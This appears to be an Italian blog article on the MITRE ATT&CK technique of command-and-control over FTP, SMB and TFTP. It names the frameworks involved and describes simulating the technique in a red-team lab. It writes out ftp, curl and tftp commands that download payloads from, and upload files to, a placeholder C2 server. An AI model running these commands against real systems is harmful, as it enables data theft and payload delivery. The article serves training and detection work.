C2 via Protocolli di Trasferimento File: File Transfer Protocols (T1071.002)

FTP, FTPS, SMB e TFTP sono protocolli che qualunque rete aziendale utilizza quotidianamente per lo spostamento di file tra server, workstation e dispositivi di rete. Proprio questa ubiquità li rende un canale ideale per il Command and Control (TA0011): un avversario che incapsula comandi e risposte dentro sessioni FTP o named pipe SMB si mimetizza nel traffico legittimo, rendendo la detection una sfida concreta.

La tecnica T1071.002 sfrutta il livello applicativo di questi protocolli. I pacchetti FTP e SMB presentano numerosi campi e header in cui occultare dati; persino i file trasferiti possono diventare contenitore per istruzioni o esfiltrazione. L'attaccante non ha bisogno di protocolli esotici: basta un server FTP controllato dall'esterno o una share SMB interna per mantenere un canale C2 stabile, difficile da distinguere dal traffico ordinario.

I numeri del framework lo confermano: 4 gruppi APT, 19 software (tra malware e tool offensivi), 2 campagne documentate e 2 mitigazioni ruotano attorno a questa sotto-tecnica. Gruppi come APT41 e Kimsuky la utilizzano per il download di payload, mentre framework come Cobalt Strike e Mythic la implementano nativamente per la comunicazione peer-to-peer su SMB. Il risultato è uno scenario in cui il confine tra traffico di trasferimento file legittimo e canale di comando avversario diventa sottilissimo, e richiede un approccio di detection multi-layer.


Il modo più diretto per simulare un canale C2 via protocolli di trasferimento file è partire da SMB, perché quasi ogni ambiente Windows lo ha attivo e le named pipe offrono un canale peer-to-peer naturale. In un laboratorio red team, Cobalt Strike (a pagamento) resta il riferimento: il listener SMB si configura creando un profilo che incapsula la comunicazione nelle named pipe standard. Una volta generato il beacon, il canale C2 transita su porta 445 senza generare connessioni verso l'esterno — tutto il traffico resta interno, delegato a un beacon "parent" con uscita HTTP o DNS.

Per chi preferisce un'alternativa open source, Mythic (open source) supporta profili C2 SMB-based. L'architettura modulare permette di selezionare l'agent (ad esempio il payload Athena o Apollo) e associare il profilo SMB come canale di trasporto. In fase di setup nel laboratorio, si configura il profilo C2 direttamente dall'interfaccia web di Mythic, specificando il nome della named pipe da utilizzare.

Havoc (open source) offre un'altra opzione concreta: il suo listener SMB permette la comunicazione laterale tra implant senza traffico Internet diretto, simulando lo stesso pattern operativo che il framework documenta per la comunicazione C2.

Sul fronte FTP, la simulazione è ancora più semplice. Si può allestire un server FTP controllato con vsftpd (open source) o pyftpdlib (open source) su una macchina d'attacco e poi forzare il target a eseguire un download da quel server. Una sequenza basilare da shell compromessa:

ftp -n -s:script.txt <indirizzo-server-C2>

Dove script.txt contiene le credenziali e i comandi GET per scaricare payload. Questo replica il pattern usato da APT41, che ha impiegato payload con download via FTP, e quello di PUBLOAD, che sfrutta curl per esfiltrare dati su FTP:

curl -T C:\dati\archivio.rar ftp://utente:password@<indirizzo-server-C2>/upload/

Per TFTP, tipicamente usato in ambienti con dispositivi di rete, il comando nativo Windows funziona senza installazioni aggiuntive:

tftp -i <indirizzo-server-C2> PUT C:\Windows\Temp\exfil.bin

Infine, per validare che il traffico generato sia realmente indistinguibile da quello legittimo, si consiglia di catturare il pcap con Wireshark (open source) e confrontare le sessioni simulate con quelle di baseline. Questo è il vero valore aggiunto dell'esercizio: non solo verificare che il canale funzioni, ma dimostrare al blue team quanto sia difficile distinguerlo dal rumore di fondo.


Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo

We use cookies

Utilizziamo i cookie sul nostro sito Web. Alcuni di essi sono essenziali per il funzionamento del sito, mentre altri ci aiutano a migliorare questo sito e l'esperienza dell'utente (cookie di tracciamento). Puoi decidere tu stesso se consentire o meno i cookie. Ti preghiamo di notare che se li rifiuti, potresti non essere in grado di utilizzare tutte le funzionalità del sito.